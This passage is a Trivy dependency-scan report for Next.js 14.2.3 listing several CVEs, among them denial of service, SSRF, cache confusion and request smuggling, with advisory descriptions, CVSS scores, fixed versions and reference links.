PkgIdentifier: PURL: pkg:npm/next@14.2.3 UID: 494c23d2c970c8b InstalledVersion: 14.2.3 FixedVersion: 15.5.15, 16.2.3 Status: fixed SeveritySource: ghsa PrimaryURL: https://github.com/advisories/GHSA-q4gf-8mx6-v5v3 DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: sha256:da8071eff38bff6de90b2e9abbd23b85c6d34bf93862a462071e7b8a1af9dee8 Title: Next.js has a Denial of Service with Server Components Description: 'A vulnerability affects certain React Server Components packages for versions 19.x and frameworks that use the affected packages, including Next.js 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream as [CVE-2026-23869](https://github.com/facebook/react/security/advisories/GHSA-479c-33wc-g2pg). You can read more about this advisory our [this changelog](https://vercel.com/changelog/summary-of-cve-2026-23869). A specially crafted HTTP request can be sent to any App Router Server Function endpoint that, when deserialized, may trigger excessive CPU usage. This can result in denial of service in unpatched environments.' Severity: HIGH VendorSeverity: ghsa: 3 CVSS: ghsa: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H V3Score: 7.5 References: - https://github.com/vercel/next.js - https://github.com/vercel/next.js/security/advisories/GHSA-q4gf-8mx6-v5v3 - https://vercel.com/changelog/summary-of-cve-2026-23869 PublishedDate: '2026-04-10T15:35:47Z' LastModifiedDate: '2026-04-10T15:35:47Z' context: sbom: name: next version: 14.2.3 path: /package-lock.json compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 23.333333333333336 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 7 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 85e92c5109af9055 ruleId: CVE-2024-47831 severity: MEDIUM tool: name: trivy version: unknown location: path: package-lock.json startLine: 0 message: 'next.js: Next.js image optimization has Denial of Service condition' title: CVE-2024-47831 description: Next.js is a React Framework for the Web. Cersions on the 10.x, 11.x, 12.x, 13.x, and 14.x branches before version 14.2.7 contain a vulnerability in the image optimization feature which allows for a potential Denial of Service (DoS) condition which could lead to excessive CPU consumption. Neither the `next.config.js` file that is configured with `images.unoptimized` set to `true` or `images.loader` set to a non-default value nor the Next.js application that is hosted on Vercel are affected. This issue was fully patched in Next.js `14.2.7`. As a workaround, ensure that the `next.config.js` file has either `images.unoptimized`, `images.loader` or `images.loaderFile` assigned. remediation: https://avd.aquasec.com/nvd/cve-2024-47831 references: [] tags: - vulnerability - pkg:next@14.2.3 risk: cwe: &id029 - CWE-674 raw: VulnerabilityID: CVE-2024-47831 VendorIDs: - GHSA-g77x-44xx-532m PkgID: next@14.2.3 PkgName: next PkgIdentifier: PURL: pkg:npm/next@14.2.3 UID: 494c23d2c970c8b InstalledVersion: 14.2.3 FixedVersion: 14.2.7 Status: fixed SeveritySource: ghsa PrimaryURL: https://avd.aquasec.com/nvd/cve-2024-47831 DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: sha256:870deb891342fbe836ab949cbe906351d888b979160e220ba5de55491995cc81 Title: 'next.js: Next.js image optimization has Denial of Service condition' Description: Next.js is a React Framework for the Web. Cersions on the 10.x, 11.x, 12.x, 13.x, and 14.x branches before version 14.2.7 contain a vulnerability in the image optimization feature which allows for a potential Denial of Service (DoS) condition which could lead to excessive CPU consumption. Neither the `next.config.js` file that is configured with `images.unoptimized` set to `true` or `images.loader` set to a non-default value nor the Next.js application that is hosted on Vercel are affected. This issue was fully patched in Next.js `14.2.7`. As a workaround, ensure that the `next.config.js` file has either `images.unoptimized`, `images.loader` or `images.loaderFile` assigned. Severity: MEDIUM CweIDs: *id029 VendorSeverity: ghsa: 2 nvd: 3 redhat: 2 CVSS: ghsa: V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H V40Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U V3Score: 5.9 V40Score: 4.6 nvd: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H V3Score: 7.5 redhat: V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H V3Score: 5.9 References: - https://access.redhat.com/security/cve/CVE-2024-47831 - https://github.com/vercel/next.js - https://github.com/vercel/next.js/commit/d11cbc9ff0b1aaefabcba9afe1e562e0b1fde65a - https://github.com/vercel/next.js/security/advisories/GHSA-g77x-44xx-532m - https://nvd.nist.gov/vuln/detail/CVE-2024-47831 - https://www.cve.org/CVERecord?id=CVE-2024-47831 PublishedDate: '2024-10-14T18:15:05.013Z' LastModifiedDate: '2024-11-08T15:39:21.823Z' context: sbom: name: next version: 14.2.3 path: /package-lock.json compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 14.029866666666669 epss: 0.01306 epss_percentile: 0.79982 is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.05224 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: ec4e4216710b1a54 ruleId: CVE-2024-56332 severity: MEDIUM tool: name: trivy version: unknown location: path: package-lock.json startLine: 0 message: 'next.js: Next.js Vulnerable to Denial of Service (DoS) with Server Actions' title: CVE-2024-56332 description: 'Next.js is a React framework for building full-stack web applications. Starting in version 13.0.0 and prior to versions 13.5.8, 14.2.21, and 15.1.2, Next.js is vulnerable to a Denial of Service (DoS) attack that allows attackers to construct requests that leaves requests to Server Actions hanging until the hosting provider cancels the function execution. This vulnerability can also be used as a Denial of Wallet (DoW) attack when deployed in providers billing by response times. (Note: Next.js server is idle during that time and only keeps the connection open. CPU and memory footprint are low during that time.). Deployments without any protection against long running Server Action invocations are especially vulnerable. Hosting providers like Vercel or Netlify set a default maximum duration on function execution to reduce the risk of excessive billing. This is the same issue as if the incoming HTTP request has an invalid `Content-Length` header or never closes. If the host has no other mitigations to those then this vulnerability is novel. This vulnerability affects only Next.js deployments using Server Actions. The issue was resolved in Next.js 13.5.8, 14.2.21, and 15.1.2. We recommend that users upgrade to a safe version. There are no official workarounds.' remediation: https://avd.aquasec.com/nvd/cve-2024-56332 references: [] tags: - vulnerability - pkg:next@14.2.3 risk: cwe: &id030 - CWE-770 raw: VulnerabilityID: CVE-2024-56332 VendorIDs: - GHSA-7m27-7ghc-44w9 PkgID: next@14.2.3 PkgName: next PkgIdentifier: PURL: pkg:npm/next@14.2.3 UID: 494c23d2c970c8b InstalledVersion: 14.2.3 FixedVersion: 13.5.8, 14.2.21, 15.1.2 Status: fixed SeveritySource: ghsa PrimaryURL: https://avd.aquasec.com/nvd/cve-2024-56332 DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: sha256:0901356f7f4fa09450af3a433f9f257bcba669b0b1a39982832d1306434411e5 Title: 'next.js: Next.js Vulnerable to Denial of Service (DoS) with Server Actions' Description: 'Next.js is a React framework for building full-stack web applications. Starting in version 13.0.0 and prior to versions 13.5.8, 14.2.21, and 15.1.2, Next.js is vulnerable to a Denial of Service (DoS) attack that allows attackers to construct requests that leaves requests to Server Actions hanging until the hosting provider cancels the function execution. This vulnerability can also be used as a Denial of Wallet (DoW) attack when deployed in providers billing by response times. (Note: Next.js server is idle during that time and only keeps the connection open. CPU and memory footprint are low during that time.). Deployments without any protection against long running Server Action invocations are especially vulnerable. Hosting providers like Vercel or Netlify set a default maximum duration on function execution to reduce the risk of excessive billing. This is the same issue as if the incoming HTTP request has an invalid `Content-Length` header or never closes. If the host has no other mitigations to those then this vulnerability is novel. This vulnerability affects only Next.js deployments using Server Actions. The issue was resolved in Next.js 13.5.8, 14.2.21, and 15.1.2. We recommend that users upgrade to a safe version. There are no official workarounds.' Severity: MEDIUM CweIDs: *id030 VendorSeverity: ghsa: 2 redhat: 2 CVSS: ghsa: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L V3Score: 5.3 redhat: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L V3Score: 5.3 References: - https://access.redhat.com/security/cve/CVE-2024-56332 - https://github.com/vercel/next.js - https://github.com/vercel/next.js/security/advisories/GHSA-7m27-7ghc-44w9 - https://nvd.nist.gov/vuln/detail/CVE-2024-56332 - https://www.cve.org/CVERecord?id=CVE-2024-56332 PublishedDate: '2025-01-03T21:15:13.55Z' LastModifiedDate: '2025-09-10T15:48:41.83Z' context: sbom: name: next version: 14.2.3 path: /package-lock.json compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 13.559466666666669 epss: 0.00424 epss_percentile: 0.62356 is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.01696 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 396a9deaca66993c ruleId: CVE-2025-55173 severity: MEDIUM tool: name: trivy version: unknown location: path: package-lock.json startLine: 0 message: 'nextjs: Next.js Content Injection Vulnerability for Image Optimization' title: CVE-2025-55173 description: Next.js is a React framework for building full-stack web applications. In versions before 14.2.31 and from 15.0.0 to before 15.4.5, Next.js Image Optimization is vulnerable to content injection. The issue allowed attacker-controlled external image sources to trigger file downloads with arbitrary content and filenames under specific configurations. This behavior could be abused for phishing or malicious file delivery. This vulnerability has been fixed in Next.js versions 14.2.31 and 15.4.5. remediation: https://avd.aquasec.com/nvd/cve-2025-55173 references: [] tags: - vulnerability - pkg:next@14.2.3 risk: cwe: &id031 - CWE-20 raw: VulnerabilityID: CVE-2025-55173 VendorIDs: - GHSA-xv57-4mr9-wg8v PkgID: next@14.2.3 PkgName: next PkgIdentifier: PURL: pkg:npm/next@14.2.3 UID: 494c23d2c970c8b InstalledVersion: 14.2.3 FixedVersion: 14.2.31, 15.4.5 Status: fixed SeveritySource: ghsa PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-55173 DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: sha256:4f427324d504eade5234a30344e36974820c0e709bf9b4e93f269dc3d12b445e Title: 'nextjs: Next.js Content Injection Vulnerability for Image Optimization' Description: Next.js is a React framework for building full-stack web applications. In versions before 14.2.31 and from 15.0.0 to before 15.4.5, Next.js Image Optimization is vulnerable to content injection. The issue allowed attacker-controlled external image sources to trigger file downloads with arbitrary content and filenames under specific configurations. This behavior could be abused for phishing or malicious file delivery. This vulnerability has been fixed in Next.js versions 14.2.31 and 15.4.5. Severity: MEDIUM CweIDs: *id031 VendorSeverity: ghsa: 2 redhat: 2 CVSS: ghsa: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N V3Score: 4.3 redhat: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N V3Score: 4.3 References: - http://vercel.com/changelog/cve-2025-55173 - https://access.redhat.com/security/cve/CVE-2025-55173 - https://github.com/vercel/next.js - https://github.com/vercel/next.js/commit/6b12c60c61ee80cb0443ccd20de82ca9b4422ddd - https://github.com/vercel/next.js/security/advisories/GHSA-xv57-4mr9-wg8v - https://nvd.nist.gov/vuln/detail/CVE-2025-55173 - https://vercel.com/changelog/cve-2025-55173 - https://www.cve.org/CVERecord?id=CVE-2025-55173 PublishedDate: '2025-08-29T22:15:31.75Z' LastModifiedDate: '2025-09-08T16:42:57.183Z' context: sbom: name: next version: 14.2.3 path: /package-lock.json compliance: owaspTop10_2021: - A03:2021 cweTop25_2024: - id: CWE-20 rank: 4 category: Input Validation cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 13.610133333333334 epss: 0.00519 epss_percentile: 0.67013 is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0207600000000001 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 90791fc1fd7573b4 ruleId: CVE-2025-57752 severity: MEDIUM tool: name: trivy version: unknown location: path: package-lock.json startLine: 0 message: 'nextjs: Next.js Affected by Cache Key Confusion for Image Optimization API Routes' title: CVE-2025-57752 description: Next.js is a React framework for building full-stack web applications. In versions before 14.2.31 and from 15.0.0 to before 15.4.5, Next.js Image Optimization API routes are affected by cache key confusion. When images returned from API routes vary based on request headers (such as Cookie or Authorization), these responses could be incorrectly cached and served to unauthorized users due to a cache key confusion bug. This vulnerability has been fixed in Next.js versions 14.2.31 and 15.4.5. All users are encouraged to upgrade if they use API routes to serve images that depend on request headers and have image optimization enabled. remediation: https://avd.aquasec.com/nvd/cve-2025-57752 references: [] tags: - vulnerability - pkg:next@14.2.3 risk: cwe: &id032 - CWE-524 raw: VulnerabilityID: CVE-2025-57752 VendorIDs: - GHSA-g5qg-72qw-gw5v PkgID: next@14.2.3 PkgName: next PkgIdentifier: PURL: pkg:npm/next@14.2.3 UID: 494c23d2c970c8b InstalledVersion: 14.2.3 FixedVersion: 14.2.31, 15.4.5 Status: fixed SeveritySource: ghsa PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-57752 DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: sha256:e3be615ed1140070180ac876273edccfb1b377de96b6e4f65e1ad6ef700e860a Title: 'nextjs: Next.js Affected by Cache Key Confusion for Image Optimization API Routes' Description: Next.js is a React framework for building full-stack web applications. In versions before 14.2.31 and from 15.0.0 to before 15.4.5, Next.js Image Optimization API routes are affected by cache key confusion. When images returned from API routes vary based on request headers (such as Cookie or Authorization), these responses could be incorrectly cached and served to unauthorized users due to a cache key confusion bug. This vulnerability has been fixed in Next.js versions 14.2.31 and 15.4.5. All users are encouraged to upgrade if they use API routes to serve images that depend on request headers and have image optimization enabled. Severity: MEDIUM CweIDs: *id032 VendorSeverity: ghsa: 2 redhat: 2 CVSS: ghsa: V3Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N V3Score: 6.2 redhat: V3Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N V3Score: 6.2 References: - https://access.redhat.com/security/cve/CVE-2025-57752 - https://github.com/vercel/next.js - https://github.com/vercel/next.js/commit/6b12c60c61ee80cb0443ccd20de82ca9b4422ddd - https://github.com/vercel/next.js/pull/82114 - https://github.com/vercel/next.js/security/advisories/GHSA-g5qg-72qw-gw5v - https://nvd.nist.gov/vuln/detail/CVE-2025-57752 - https://vercel.com/changelog/cve-2025-57752 - https://www.cve.org/CVERecord?id=CVE-2025-57752 PublishedDate: '2025-08-29T22:15:31.963Z' LastModifiedDate: '2025-09-08T16:43:50.33Z' context: sbom: name: next version: 14.2.3 path: /package-lock.json compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 13.391466666666664 epss: 0.00109 epss_percentile: 0.28624 is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.00436 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 027359ccd596dbb5 ruleId: CVE-2025-57822 severity: MEDIUM tool: name: trivy version: unknown location: path: package-lock.json startLine: 0 message: Next.js Improper Middleware Redirect Handling Leads to SSRF title: CVE-2025-57822 description: Next.js is a React framework for building full-stack web applications. Prior to versions 14.2.32 and 15.4.7, when next() was used without explicitly passing the request object, it could lead to SSRF in self-hosted applications that incorrectly forwarded user-supplied headers. This vulnerability has been fixed in Next.js versions 14.2.32 and 15.4.7. All users implementing custom middleware logic in self-hosted environments are strongly encouraged to upgrade and verify correct usage of the next() function. remediation: https://avd.aquasec.com/nvd/cve-2025-57822 references: [] tags: - vulnerability - pkg:next@14.2.3 risk: cwe: &id033 - CWE-918 raw: VulnerabilityID: CVE-2025-57822 VendorIDs: - GHSA-4342-x723-ch2f PkgID: next@14.2.3 PkgName: next PkgIdentifier: PURL: pkg:npm/next@14.2.3 UID: 494c23d2c970c8b InstalledVersion: 14.2.3 FixedVersion: 14.2.32, 15.4.7 Status: fixed SeveritySource: ghsa PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-57822 DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: sha256:d25b005e7cf8bac08753ec41dc06257909625a91eeaa10bcc06f3ea028d530e1 Title: Next.js Improper Middleware Redirect Handling Leads to SSRF Description: Next.js is a React framework for building full-stack web applications. Prior to versions 14.2.32 and 15.4.7, when next() was used without explicitly passing the request object, it could lead to SSRF in self-hosted applications that incorrectly forwarded user-supplied headers. This vulnerability has been fixed in Next.js versions 14.2.32 and 15.4.7. All users implementing custom middleware logic in self-hosted environments are strongly encouraged to upgrade and verify correct usage of the next() function. Severity: MEDIUM CweIDs: *id033 VendorSeverity: ghsa: 2 nvd: 3 CVSS: ghsa: V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N V3Score: 6.5 nvd: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N V3Score: 8.2 References: - https://github.com/vercel/next.js - https://github.com/vercel/next.js/commit/9c9aaed5bb9338ef31b0517ccf0ab4414f2093d8 - https://github.com/vercel/next.js/security/advisories/GHSA-4342-x723-ch2f - https://nvd.nist.gov/vuln/detail/CVE-2025-57822 - https://vercel.com/changelog/cve-2025-57822 PublishedDate: '2025-08-29T22:15:32.143Z' LastModifiedDate: '2025-09-08T16:41:41.253Z' context: sbom: name: next version: 14.2.3 path: /package-lock.json compliance: owaspTop10_2021: - A10:2021 cweTop25_2024: - id: CWE-918 rank: 19 category: SSRF cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 17.501333333333335 epss: 0.07815 epss_percentile: 0.92065 is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.3126 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 580a09237cbe3791 ruleId: CVE-2025-59471 severity: MEDIUM tool: name: trivy version: unknown location: path: package-lock.json startLine: 0 message: 'next: NextJS Denial of Service in Image Optimizer' title: CVE-2025-59471 description: "A denial of service vulnerability exists in self-hosted Next.js applications\ \ that have `remotePatterns` configured for the Image Optimizer. The image optimization\ \ endpoint (`/_next/image`) loads external images entirely into memory without\ \ enforcing a maximum size limit, allowing an attacker to cause out-of-memory\ \ conditions by requesting optimization of arbitrarily large images. This vulnerability\ \ requires that `remotePatterns` is configured to allow image optimization from\ \ external domains and that the attacker can serve or control a large image on\ \ an allowed domain.\r\n\r\nStrongly consider upgrading to 15.5.10 or 16.1.5 to\ \ reduce risk and prevent availability issues in Next applications." remediation: https://avd.aquasec.com/nvd/cve-2025-59471 references: [] tags: - vulnerability - pkg:next@14.2.3 risk: cwe: &id034 - CWE-400 raw: VulnerabilityID: CVE-2025-59471 VendorIDs: - GHSA-9g9p-9gw9-jx7f PkgID: next@14.2.3 PkgName: next PkgIdentifier: PURL: pkg:npm/next@14.2.3 UID: 494c23d2c970c8b InstalledVersion: 14.2.3 FixedVersion: 15.5.10, 16.1.5 Status: fixed SeveritySource: ghsa PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-59471 DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: sha256:5c1c3f76d7551a0dbaa560bc61f2517af1be6d9676bb5cccc73c04f0dd664b11 Title: 'next: NextJS Denial of Service in Image Optimizer' Description: "A denial of service vulnerability exists in self-hosted Next.js\ \ applications that have `remotePatterns` configured for the Image Optimizer.\ \ The image optimization endpoint (`/_next/image`) loads external images entirely\ \ into memory without enforcing a maximum size limit, allowing an attacker to\ \ cause out-of-memory conditions by requesting optimization of arbitrarily large\ \ images. This vulnerability requires that `remotePatterns` is configured to\ \ allow image optimization from external domains and that the attacker can serve\ \ or control a large image on an allowed domain.\r\n\r\nStrongly consider upgrading\ \ to 15.5.10 or 16.1.5 to reduce risk and prevent availability issues in Next\ \ applications." Severity: MEDIUM CweIDs: *id034 VendorSeverity: ghsa: 2 nvd: 3 redhat: 2 CVSS: ghsa: V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H V3Score: 5.9 nvd: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H V3Score: 7.5 redhat: V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H V3Score: 5.9 References: - https://access.redhat.com/security/cve/CVE-2025-59471 - https://github.com/vercel/next.js - https://github.com/vercel/next.js/commit/500ec83743639addceaede95e95913398975156c - https://github.com/vercel/next.js/commit/e5b834d208fe0edf64aa26b5d76dcf6a176500ec - https://github.com/vercel/next.js/releases/tag/v15.5.10 - https://github.com/vercel/next.js/releases/tag/v16.1.5 - https://github.com/vercel/next.js/security/advisories/GHSA-9g9p-9gw9-jx7f - https://nvd.nist.gov/vuln/detail/CVE-2025-59471 - https://www.cve.org/CVERecord?id=CVE-2025-59471 PublishedDate: '2026-01-26T22:15:52.89Z' LastModifiedDate: '2026-02-13T15:03:20.29Z' context: sbom: name: next version: 14.2.3 path: /package-lock.json compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 13.347733333333334 epss: 0.00027 epss_percentile: 0.07874 is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.00108 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 04e5c6fdba912e88 ruleId: CVE-2026-27980 severity: MEDIUM tool: name: trivy version: unknown location: path: package-lock.json startLine: 0 message: 'next.js: Next.js: Unbounded next/image disk cache growth can exhaust storage' title: CVE-2026-27980 description: 'Next.js is a React framework for building full-stack web applications. Starting in version 10.0.0 and prior to version 16.1.7, the default Next.js image optimization disk cache (`/_next/image`) did not have a configurable upper bound, allowing unbounded cache growth. An attacker could generate many unique image-optimization variants and exhaust disk space, causing denial of service. This is fixed in version 16.1.7 by adding an LRU-backed disk cache with `images.maximumDiskCacheSize`, including eviction of least-recently-used entries when the limit is exceeded. Setting `maximumDiskCacheSize: 0` disables disk caching. If upgrading is not immediately possible, periodically clean `.next/cache/images` and/or reduce variant cardinality (e.g., tighten values for `images.localPatterns`, `images.remotePatterns`, and `images.qualities`).' remediation: https://avd.aquasec.com/nvd/cve-2026-27980 references: [] tags: - vulnerability - pkg:next@14.2.3 risk: cwe: &id035 - CWE-400 raw: VulnerabilityID: CVE-2026-27980 VendorIDs: - GHSA-3x4c-7xq6-9pq8 PkgID: next@14.2.3 PkgName: next PkgIdentifier: PURL: pkg:npm/next@14.2.3 UID: 494c23d2c970c8b InstalledVersion: 14.2.3 FixedVersion: 16.1.7, 15.5.14 Status: fixed SeveritySource: ghsa PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-27980 DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: sha256:5dec13177768ddafe594e0b28117c9687a4df1799c6cf21c3db279c85cdce71f Title: 'next.js: Next.js: Unbounded next/image disk cache growth can exhaust storage' Description: 'Next.js is a React framework for building full-stack web applications. Starting in version 10.0.0 and prior to version 16.1.7, the default Next.js image optimization disk cache (`/_next/image`) did not have a configurable upper bound, allowing unbounded cache growth. An attacker could generate many unique image-optimization variants and exhaust disk space, causing denial of service. This is fixed in version 16.1.7 by adding an LRU-backed disk cache with `images.maximumDiskCacheSize`, including eviction of least-recently-used entries when the limit is exceeded. Setting `maximumDiskCacheSize: 0` disables disk caching. If upgrading is not immediately possible, periodically clean `.next/cache/images` and/or reduce variant cardinality (e.g., tighten values for `images.localPatterns`, `images.remotePatterns`, and `images.qualities`).' Severity: MEDIUM CweIDs: *id035 VendorSeverity: ghsa: 2 nvd: 3 redhat: 2 CVSS: ghsa: V40Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N V40Score: 6.9 nvd: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H V3Score: 7.5 redhat: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L V3Score: 5.3 References: - https://access.redhat.com/security/cve/CVE-2026-27980 - https://github.com/vercel/next.js - https://github.com/vercel/next.js/commit/39eb8e0ac498b48855a0430fbf4c22276a73b4bd - https://github.com/vercel/next.js/releases/tag/v16.1.7 - https://github.com/vercel/next.js/security/advisories/GHSA-3x4c-7xq6-9pq8 - https://nvd.nist.gov/vuln/detail/CVE-2026-27980 - https://www.cve.org/CVERecord?id=CVE-2026-27980 PublishedDate: '2026-03-18T01:16:04.957Z' LastModifiedDate: '2026-03-18T19:52:54.307Z' context: sbom: name: next version: 14.2.3 path: /package-lock.json compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 13.345066666666668 epss: 0.00022 epss_percentile: 0.06354 is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.00088 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 868dbd425c7fc3b4 ruleId: CVE-2026-29057 severity: MEDIUM tool: name: trivy version: unknown location: path: package-lock.json startLine: 0 message: 'next.js: Next.js: HTTP request smuggling in rewrites' title: CVE-2026-29057 description: "Next.js is a React framework for building full-stack web applications.\ \ Starting in version 9.5.0 and prior to versions 15.5.13 and 16.1.7, when Next.js\ \ rewrites proxy traffic to an external backend, a crafted `DELETE`/`OPTIONS`\ \ request using `Transfer-Encoding: chunked` could trigger request boundary disagreement\ \ between the proxy and backend. This could allow request smuggling through rewritten\ \ routes. An attacker could smuggle a second request to unintended backend routes\ \ (for example, internal/admin endpoints), bypassing assumptions that only the\ \ configured rewrite destination/path is reachable. This does not impact applications\ \ hosted on providers that handle rewrites at the CDN level, such as Vercel. \ \ The vulnerability originated in an upstream library vendored by Next.js. It\ \ is fixed in Next.js 15.5.13 and 16.1.7 by updating that dependency\u2019s behavior\ \ so `content-length: 0` is added only when both `content-length` and `transfer-encoding`\ \ are absent, and `transfer-encoding` is no longer removed in that code path.\ \ If upgrading is not immediately possible, block chunked `DELETE`/`OPTIONS` requests\ \ on rewritten routes at the edge/proxy, and/or enforce authentication/authorization\ \ on backend routes." remediation: https://avd.aquasec.com/nvd/cve-2026-29057 references: [] tags: - vulnerability - pkg:next@14.2.3 risk: cwe: &id036 - CWE-444 raw: VulnerabilityID: CVE-2026-29057 VendorIDs: - GHSA-ggv3-7p47-pfv8 PkgID: next@14.2.3 PkgName: next PkgIdentifier: PURL: pkg:npm/next@14.2.3 UID: 494c23d2c970c8b InstalledVersion: 14.2.3 FixedVersion: 16.1.7, 15.5.13 Status: fixed SeveritySource: ghsa PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-29057 DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: sha256:4074e32bdcb36d75198ac9560fe4244edba80bb6731805115c47dcfbb97b302f Title: 'next.js: Next.js: HTTP request smuggling in rewrites' Description: "Next.js is a React framework for building full-stack web applications.\ \ Starting in version 9.5.0 and prior to versions 15.5.13 and 16.1.7, when Next.js\ \ rewrites proxy traffic to an external backend, a crafted `DELETE`/`OPTIONS`\ \ request using `Transfer-Encoding: chunked` could trigger request boundary\ \ disagreement between the proxy and backend. This could allow request smuggling\ \ through rewritten routes. An attacker could smuggle a second request to unintended\ \ backend routes (for example, internal/admin endpoints), bypassing assumptions\ \ that only the configured rewrite destination/path is reachable. This does\ \ not impact applications hosted on providers that handle rewrites at the CDN\ \ level, such as Vercel. The vulnerability originated in an upstream library\ \ vendored by Next.js. It is fixed in Next.js 15.5.13 and 16.1.7 by updating\ \ that dependency\u2019s behavior so `content-length: 0` is added only when\ \ both `content-length` and `transfer-encoding` are absent, and `transfer-encoding`\ \ is no longer removed in that code path. If upgrading is not immediately possible,\ \ block chunked `DELETE`/`OPTIONS` requests on rewritten routes at the edge/proxy,\ \ and/or enforce authentication/authorization on backend routes." Severity: MEDIUM CweIDs: *id036 VendorSeverity: ghsa: 2 nvd: 2 redhat: 2 CVSS: ghsa: V40Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N V40Score: 6.3 nvd: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N V3Score: 6.5 redhat: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N V3Score: 6.5 References: - https://access.redhat.com/security/cve/CVE-2026-29057 - https://github.com/vercel/next.js - https://github.com/vercel/next.js/commit/dc98c04f376c6a1df76ec3e0a2d07edf4abdabd6 - https://github.com/vercel/next.js/releases/tag/v15.5.13 - 